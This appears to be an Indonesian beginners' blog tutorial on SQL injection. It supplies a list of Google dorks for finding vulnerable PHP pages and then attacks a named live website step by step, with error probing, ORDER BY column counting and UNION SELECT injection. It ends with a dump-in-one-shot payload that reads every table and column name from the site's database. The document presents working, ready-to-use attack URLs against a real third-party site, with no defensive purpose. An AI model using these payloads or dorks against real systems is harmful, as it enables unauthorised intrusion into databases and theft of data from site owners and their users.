TUTORIAL SQLI INJECTION

Assalamualaikum wr.wb

Welkom bek cok:v

Langsong aj tanpa basa-basi.:

SEKARANG GUA AKAN MEMBERI TUTORIAL SQLI INJECTION

Apa itu SQL INJECTION.?

SQL injection {SQLi} adalah jenis serangan dimana perintah SQL disuntikkan ke input data atau semacamnya untuk memengaruhi perintah SQL yang telah ditetapkan.Serangan ini digunakan atacker untuk mendapatkan akses langsung ke database.Dan dengan demikian sang attacker bisa membaca data sensitif,hingga memodifikasi database,(Memasukkan,Memperbarui,Bahkan Menghapus).Celah Sqli ini bisa dibilang celah aplikasi web tertua, paling umum,tapi sangat berbahaya.

Sql injection juga bisa disebut sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi.

Lalu bagaimana caranya.?

CARA NYA GAMPANG BGT GAN:')
Mastah skip aja wkwk,tutor khusus pemula:')

BAHAN²
1.HP ATAU PC
2.DIOS SQLI KALIAN
3.CHROME GAN
4.MUKA GANS KEK GUA:v.(Canda bro:v)

5.PACAR BIAR ADA YG NYEMANGATIN:v

GUA PUNYA LIVE TARGET
Kita pake live target aja ya,gw males nge dork:v

Bagi yg mau ngedorking juga boleh stah

-
Dork nya nih gan

inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd

OK KE TUTORIAL NYA
live target
KLIK DISINI

kita kasih (') dan akan menjadi seperti ini
granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27

oh iya kalo vuln sqli biasa nya ada bacaan warning sqli syntax yh gan,Seperti gambar dibawah ini....

kita kasih order+by+1--+-
granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+1--+-

gk eror kita cari ampe ketemu Angka eror

granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+10--+-

eror kita cari angka ujung nya

granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+7--+-

masih eror kita cari lagi

granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+6--+-

masih eror juga:v

harus sabar gan,kek ngadepin sikap dia:v

Muehehe canda,,Lanjut...

granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+5--+-

nah udah gk eror slurd kita union+select
di angka satu kita kasih-

granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=-1%27+union+select+1,2,3,4,5--+-

NAH MUNCUL ANGKA AJAIB NYA YAH ITU 4

4 nya kita hapus kita masukin dios sqli kita:')

JADI GINI....

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=-1%27+union+select+1,2,3,concat(0x494E4A454354204259204D522E5A45524F2047484F535420434F4445,%27<br>%27,%27<img%20src%20=%https://k.top4top.io/p_1995craqg0.jpg">%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),5--+-